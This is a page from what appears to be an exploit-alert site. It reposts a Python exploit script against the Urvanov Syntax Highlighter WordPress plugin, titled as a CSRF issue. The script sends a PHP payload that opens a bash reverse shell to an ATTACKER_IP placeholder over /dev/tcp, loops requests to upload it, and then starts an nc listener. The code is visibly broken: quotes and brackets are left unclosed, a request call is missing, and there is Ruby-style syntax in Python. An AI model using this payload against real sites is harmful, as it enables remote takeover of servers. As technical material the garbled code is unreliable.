Edit Report

Our sensors found this exploit at:

Below is a copy:

Urvanov Syntax Highlighter <= 2.8.33 - Highlighting Blocks Mgt via CSRF
import requests
import os
import time
# The target URL where the Urvanov Syntax Highlighter plugin is installed
url = ''
# Your PHP shell payload
payload = '''
exec('/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1\'');
# Your attacker IP and port
attacker_ip = 'ATTACKER_IP'
attacker_port = ATTACKER_PORT
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'X-Requested-With': 'XMLHttpRequest'
# Sending the exploit
for i in range(1, 1000):
    data = {
        'action': 'highlight_shortcode_editor_blocks',
        'code': f'<pre>${i.to_s().rjust(4, "0")}.{payload}}</pre>'
    response =, headers=headers, data=data)
    print(f'Attempt {i}: {response.text}')
    if response.text == 'ok':
        print(f'Shell uploaded at: {i.to_s().rjust(4, "0")}.php')
# Set up a listener on your attacker machine to catch the reverse shell
os.system(f'nc -lvp {attacker_port}')
source :

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.